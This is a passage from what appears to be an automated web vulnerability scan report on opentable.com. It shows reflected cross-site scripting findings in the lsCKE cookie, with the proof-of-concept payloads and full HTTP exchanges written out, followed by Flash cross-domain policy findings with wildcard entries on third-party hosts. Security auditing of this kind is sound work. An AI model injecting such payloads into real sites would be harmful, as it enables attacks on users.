Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00''; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Vary: Accept-Encoding
Content-Length: 199772


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns
...[SNIP]...
<!--
var s_account="otrestref79263"-alert(1)-"082a2fb7275";
//-->
...[SNIP]...

4.93. http://www.opentable.com/restaurant-search.aspx [lsCKE cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /restaurant-search.aspx

Issue detail

The value of the lsCKE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41619"-alert(1)-"a26d3ee11 was submitted in the lsCKE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /restaurant-search.aspx?startDate=10%2F03%2F2011&ResTime=7%3A00+PM&PartySize=2&PartySizeFake=2+People&RestaurantID=90&rid=90&GeoID=4&txtDateFormat=MM%2Fdd%2Fyyyy&RestaurantReferralID=90 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref41619"-alert(1)-"a26d3ee11; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:01 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a01&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=100&p1=100&rr1=90&rr2=90; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref41619"-alert(1)-"a26d3ee11&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=yUPXoadxGQxMZ7cdkHO0kg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref41619"-alert(1)-"a26d3ee11&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=yUPXoadxGQxMZ7cdkHO0kg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref41619"-alert(1)-"a26d3ee11&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=yUPXoadxGQxMZ7cdkHO0kg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=11&vbefreg=11&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref41619"-alert(1)-"a26d3ee11&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=yUPXoadxGQxMZ7cdkHO0kg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=11&vbefreg=11&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=11&vbefreg=11&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref41619"-alert(1)-"a26d3ee11&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=yUPXoadxGQxMZ7cdkHO0kg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref41619"-alert(1)-"a26d3ee11&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=yUPXoadxGQxMZ7cdkHO0kg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref41619"-alert(1)-"a26d3ee11&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=yUPXoadxGQxMZ7cdkHO0kg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:01 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46304


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
<!--
var s_account="otrestref41619"-alert(1)-"a26d3ee11";
//-->
...[SNIP]...

4.94. http://www.opentable.com/restaurant-search.aspx [lsCKE cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /restaurant-search.aspx

Issue detail

The value of the lsCKE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0e8f"><script>alert(1)</script>b73d6d090c was submitted in the lsCKE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /restaurant-search.aspx?startDate=10%2F03%2F2011&ResTime=7%3A00+PM&PartySize=2&PartySizeFake=2+People&RestaurantID=90&rid=90&GeoID=4&txtDateFormat=MM%2Fdd%2Fyyyy&RestaurantReferralID=90 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestrefe0e8f"><script>alert(1)</script>b73d6d090c; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:00 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a00&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=100&p1=100&rr1=90&rr2=90; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefe0e8f"><script>alert(1)</script>b73d6d090c&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=skemQm14LQ9C4cW7t%2fOSWA%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefe0e8f"><script>alert(1)</script>b73d6d090c&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=skemQm14LQ9C4cW7t%2fOSWA%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestrefe0e8f"><script>alert(1)</script>b73d6d090c&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=skemQm14LQ9C4cW7t%2fOSWA%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=7&vbefreg=7&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefe0e8f"><script>alert(1)</script>b73d6d090c&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=skemQm14LQ9C4cW7t%2fOSWA%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=7&vbefreg=7&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=7&vbefreg=7&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefe0e8f"><script>alert(1)</script>b73d6d090c&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=skemQm14LQ9C4cW7t%2fOSWA%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefe0e8f"><script>alert(1)</script>b73d6d090c&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=skemQm14LQ9C4cW7t%2fOSWA%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefe0e8f"><script>alert(1)</script>b73d6d090c&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=skemQm14LQ9C4cW7t%2fOSWA%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46339


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
<img src="http://o.opentable.com/b/ss/otrestrefe0e8f"><script>alert(1)</script>b73d6d090c/1/H.22.1--NS/0" height="1" width="1" border="0" alt="" />
...[SNIP]...

5. Flash cross-domain policy
There are 22 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains. The domain list is not the whole policy: an allow-http-request-headers-from element with domain="*" and headers="*" lets a SWF from any domain send arbitrary request headers; secure="false" on a host served over HTTPS lets a plain-HTTP SWF from that domain read its HTTPS responses; and a site-control element with permitted-cross-domain-policies="all" lets any file on the host be loaded as a policy, which matters wherever users can upload content. A host that serves only tracking pixels or public map tiles can tolerate domain="*"; one that sets session cookies cannot.


5.1. http://as00.estara.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://as00.estara.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: as00.estara.com

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:54:08 GMT
Server: Apache
Last-Modified: Thu, 14 Jul 2011 10:16:38 GMT
Accept-Ranges: bytes
Content-Length: 567
Cache-Control: max-age=2592000
Expires: Wed, 02 Nov 2011 12:54:08 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!-- http://as00.estara.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.estara.com" />
<allow-access-from domain="*.sh01.de" />
<allow-access-from domain="*.dwsgo.de" />
<allow-access-from domain="*.sosbonnesexcuses.com" />
<allow-access-from domain="*.lagencesecrete.com" />
<allow-access-from domain="*.livefeeds.gr" />
<allow-access-from domain="*.paeiopaliosoxronos.gr" />
<allow-access-from domain="*.kokkinostypos.gr" />
<allow-access-from domain="*" />
...[SNIP]...

5.2. http://dev.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dev.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Sun, 18 Sep 2011 00:40:53 GMT
Accept-Ranges: bytes
ETag: "63203e9f9b75cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:56:15 GMT
Connection: close
Content-Length: 277

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-r
...[SNIP]...

5.3. http://ecn.dev.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.dev.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.dev.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Sun, 18 Sep 2011 00:40:53 GMT
Accept-Ranges: bytes
ETag: "63203e9f9b75cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:52:58 GMT
Content-Length: 277
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-r
...[SNIP]...

5.4. http://ecn.t0.tiles.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t0.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t0.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8dd9956cd874cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 221277
Date: Mon, 03 Oct 2011 12:56:17 GMT
Last-Modified: Sat, 17 Sep 2011 01:23:37 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.5. http://ecn.t1.tiles.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t1.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t1.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8dd9956cd874cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 214740
Date: Mon, 03 Oct 2011 12:56:16 GMT
Last-Modified: Sat, 17 Sep 2011 01:23:37 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.6. http://ecn.t2.tiles.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t2.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t2.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8dd9956cd874cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 72520
Date: Mon, 03 Oct 2011 12:56:17 GMT
Last-Modified: Sat, 17 Sep 2011 01:23:37 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.7. http://ecn.t3.tiles.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t3.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

